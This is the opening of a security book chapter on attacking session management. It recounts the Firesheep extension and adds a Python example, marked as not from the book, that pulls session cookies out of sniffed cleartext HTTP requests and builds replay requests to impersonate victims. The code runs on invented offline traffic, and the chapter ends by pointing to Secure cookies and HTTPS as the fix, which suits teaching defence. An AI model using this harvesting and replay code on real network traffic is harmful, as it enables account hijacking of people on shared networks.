chapter three
3 Attacking session management
This chapter covers
- Understanding how session management works;
- How session identification data may be stolen by attackers;
- Determining that an attack has occurred, and how to prevent it altogether;
- Protecting session (and other) cookies;
- Making sure HTTPS is used throughout.
In late 2010, software developer Eric Butler released a Firefox extension called “Firesheep”. It worked like this: connect to a public Wi-Fi network, like the one at a train station or coffee shop. Once installed and active, the extension passively captured the unencrypted traffic on that wireless network and looked for the session cookies that a select number of sites sent over plain HTTP. Many of those sites protected the login form itself with HTTPS, but then handed the browser a session cookie that was sent in the clear on every later request, which is all an eavesdropper needs. If someone else on the same network was logged into one of those sites, the extension listed that person and offered to take you to the site as them. And indeed, one click later, you were using a third-party site as the person sitting close to you, without ever entering a password. Those sites included:
- Amazon;
- Facebook;
- Google (including Google Mail);
- Hacker News;
- LinkedIn;
- Quora;
- Reddit;
- Stack Overflow;
- Twitter;
- Windows Live (including Windows Live Mail, previously known as Hotmail);
- Yahoo (including Yahoo Mail);
- And about 20 more.
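The attack described above, as an added example that is not part of the book and is not Firesheep's own code: a passive listener parses cleartext HTTP requests it has overheard, picks out the session cookie, and builds the request that replays it against the site. The requests here are constructed byte strings standing in for sniffed frames; the hosts, paths and cookie values are invented, and the list of session-cookie names is an assumed heuristic (Firesheep instead shipped a handler per site that knew that site's cookie names).

```python
"""Firesheep-style session harvesting, run offline over constructed traffic.

Added example, not code from the book or from Firesheep. A real sniffer
would feed raw frames from libpcap into harvest_sessions(); here the
"captured" requests are constructed byte strings.
"""
from typing import Dict, List, Optional, Tuple

# Constructed sample of what a passive listener on an open Wi-Fi network
# sees: cleartext HTTP requests from other clients. Hosts, paths and cookie
# values are invented.
CAPTURED_REQUESTS: List[bytes] = [
    (b"GET /home HTTP/1.1\r\n"
     b"Host: social.example\r\n"
     b"Cookie: theme=dark; sid=8f3a91c0d2e14b7f; lang=en\r\n"
     b"User-Agent: Mozilla/5.0\r\n\r\n"),
    (b"GET /static/logo.png HTTP/1.1\r\n"
     b"Host: cdn.example\r\n\r\n"),  # no cookie: nothing to steal
    (b"POST /api/ping HTTP/1.1\r\n"
     b"Host: mail.example\r\n"
     b"Cookie: SESSIONID=c4d2e6f8a0b2c4d6; tz=UTC\r\n"
     b"Content-Length: 0\r\n\r\n"),
]

# Assumption: a heuristic list of common session-cookie names, compared
# case-insensitively. Firesheep knew the exact names per site instead.
SESSION_COOKIE_NAMES = {"sid", "sessionid", "_session_id", "phpsessid", "jsessionid"}


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str]]:
    """Split a cleartext HTTP request into (method, path, headers).

    Header names are lower-cased; repeated headers are joined with '; ' so
    that several Cookie lines behave like one.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        name = name.strip().lower()
        value = value.strip()
        headers[name] = f"{headers[name]}; {value}" if name in headers else value
    return method, path, headers


def parse_cookie_header(value: str) -> Dict[str, str]:
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'} (order preserved)."""
    cookies: Dict[str, str] = {}
    for pair in value.split(";"):
        name, _, val = pair.strip().partition("=")
        if name:
            cookies[name] = val
    return cookies


def find_session_cookie(cookies: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """Return (name, value) of the first cookie that looks like a session id."""
    for name, val in cookies.items():
        if name.lower() in SESSION_COOKIE_NAMES:
            return name, val
    return None


def harvest_sessions(captures: List[bytes]) -> List[Dict[str, str]]:
    """Extract every hijackable session from a batch of sniffed requests."""
    found: List[Dict[str, str]] = []
    for raw in captures:
        _method, _path, headers = parse_request(raw)
        if "cookie" not in headers or "host" not in headers:
            continue
        hit = find_session_cookie(parse_cookie_header(headers["cookie"]))
        if hit is None:
            continue
        found.append({
            "host": headers["host"],
            "session_name": hit[0],
            "session_value": hit[1],
            # Replay the whole cookie jar, as Firesheep did: some sites need
            # more than the one session cookie before they accept a request.
            "cookie_header": headers["cookie"],
        })
    return found


def replay_request(session: Dict[str, str], path: str = "/") -> bytes:
    """Build the request the attacker sends to act as the victim."""
    return (f"GET {path} HTTP/1.1\r\n"
            f"Host: {session['host']}\r\n"
            f"Cookie: {session['cookie_header']}\r\n"
            f"Connection: close\r\n\r\n").encode("latin-1")


if __name__ == "__main__":
    for s in harvest_sessions(CAPTURED_REQUESTS):
        print(f"{s['host']}: {s['session_name']}={s['session_value']}")
        print(replay_request(s).decode("latin-1"))
```

Nothing in this code is clever: the only thing the attacker needs is that the cookie travels in the clear. Sending the cookie only over HTTPS (the `Secure` attribute and HTTPS throughout the site, covered later in this chapter) removes the input to `harvest_sessions()` entirely.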